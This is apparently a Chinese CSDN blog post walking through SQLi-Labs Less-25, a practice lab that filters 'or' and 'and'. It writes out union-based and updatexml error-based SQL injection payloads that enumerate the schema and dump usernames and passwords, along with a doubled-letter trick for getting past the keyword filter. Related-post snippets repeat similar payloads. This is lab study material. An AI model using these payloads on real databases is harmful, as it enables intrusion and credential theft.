SQL-LABS 25关

最新推荐文章于 2024-03-16 18:46:26 发布
最新推荐文章于 2024-03-16 18:46:26 发布
阅读量219 收藏
点赞数 1
分类专栏: 笔记 文章标签: sql 数据库 mvc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52863655/article/details/119937689
版权

第二十五关:
直接开始验证它的闭合符号。发现是单引号闭合,然后查列 利用 order by
在这里插入图片描述http://127.0.0.1/sqli/Less-25/?id=122’ order by 2
查看底下的蓝字发现少了or 所以猜测对or进行了绕过。所以采用union select进行查询
在这里插入图片描述
http://127.0.0.1/sqli/Less-25/?id=122’ union select 1,2,3–+
可以查询出。接下来就是常规注入。
查库:http://127.0.0.1/sqli/Less-25/?id=122’ union select 1,database(),3–+
在这里插入图片描述

查表:select group_concat(table_name) from information_schema.tables where table_schema=’security’;
在这里插入图片描述

查列:select group_concat(column_name) from information_schema.columns where table_name=’users’;
在这里插入图片描述

查字段:selsct username,password from security.users;
在这里插入图片描述
在这里插入图片描述

但是本关还可以利用报错注入方式进行注入。

在这里插入图片描述
语句:http://127.0.0.1/sqli/Less-25/?id=122’ union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=‘security’)),1),3–+

qq_52863655
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
SQL-labs的第25——or和and被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 145
我们发现该网站有回显点,所以我们使用union联合攻击。但是注意此的难点是and和or被过滤。哪怕是一个单词里面有or和and也不行。\的后面是',所以闭合方式是;所以第二和第三个位置是回显点。所以一共有3个注入点。
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1357
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqllab第二十五A笔记
最新发布
I_WORM的博客
03-16 411
构造payload:id=1/0+union+select+1,version(),database()+--+构造payload:id=1/0+union+select+1,2,3+--+构造payload:id=1/0+oorr+exp(710)=1--+构造payload:id=1/0+oorr+1=1--+同理,可以获取数据库其他内容,这里不演示了,收工。发现没有任何的回显信息,说明这里不能用错误注入。发现成功运算了,这是一个数值型的注入。成功显示了内容,可以尝试错误注入。成功回显了输入的内容。
sqli-labs Less-2525a(sqli-labs闯指南 2525a)
m0_54899775的博客
12-25 898
sqli-labs Less-2525a(sqli-labs闯指南 2525a)
Sqllab记录(21~30)白盒测试
m0_56375711的博客
12-06 377
sqllab记录(20~30)白盒测试
SQL-labs的第25a——or和and被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 105
有回显点我们选择联合攻击。判断回显点的方式和第25一样。这说明这无闭合方式,是数字型注入。
Sqli-labs——lesson25(联合查询和报错注入,附各种sql万能密码)
weixin_62281892的博客
07-12 876
25
sql-labs 25-35 非常详细/必会/
ChenD的学习笔记
10-09 370
sql-labs 25-35
sql-labs 闯 21~25
qq_44663230的博客
08-29 1139
sql-labs 闯21~25
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 879
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
sqli-labs25(基于get提交的过滤and和or的联合注入)
zyh1588的博客
01-16 1147
小白回顾sqli-labs靶场25
sqli-labs闯小游戏21-65.docx
10-23
这是个sql注入的文档,是sqli-labs闯小游戏二十一到六十五的详解,每一的步骤写得都很详细,前二十的话我已经发布了博客,有需要的可以下载一下。
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五SQLi-LABS Less-25SQLi-LABS Less 25SQLiLABS Less25SQLi Less 25
sqli-labs 25-30 超详细
m0_64361111的博客
03-18 792
25 输入?id=1’报错 ?id=1’--+ 正常回显 说明存在字符型注入 输入and 1=1 发现and被过滤 输入order by 发现 or 被过滤 由于不能使用or和and ,所以直接使用联合查询 3正常 4报错 ,说明只有三个字段 回显位是2 和3 然后就可以套用payload了 /?id=-1’union select 1,2,database()--+ // 获取数据库名 /?id=-1’union select 1,2,gr...
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点和攻击方式。 2. 找到注入点:在该卡中,你需要找到一个可以在 SQL 查询语句中注入恶意代码的输入点。尝试输入一些字符并观察是否有错误信息或异常行为,这可能是一个注入点的迹象。 3. 确认注入点:一旦找到潜在的注入点,你可以尝试输入一些特殊字符如单引号 ' 或双引号 " 来确认是否存在注入漏洞。如果应用程序返回错误信息或异常,那么很可能存在注入漏洞。 4. 利用注入:一旦确认存在注入漏洞,你可以通过构造恶意的输入来利用它。尝试使用 UNION SELECT 语句来获取额外的信息或执行其他操作。例如,你可以尝试 UNION SELECT NULL, table_name FROM information_schema.tables 来获取数据库中的表名。 5. 进一步探索:一旦成功利用注入漏洞,并且获得了足够的信息,你可以进一步探索数据库,执行其他命令或尝试绕过应用程序的安全措施。 请注意,在实际环境中进行 SQL 注入攻击是非法的,你应该仅限于在合法的演练平台上进行学习和测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值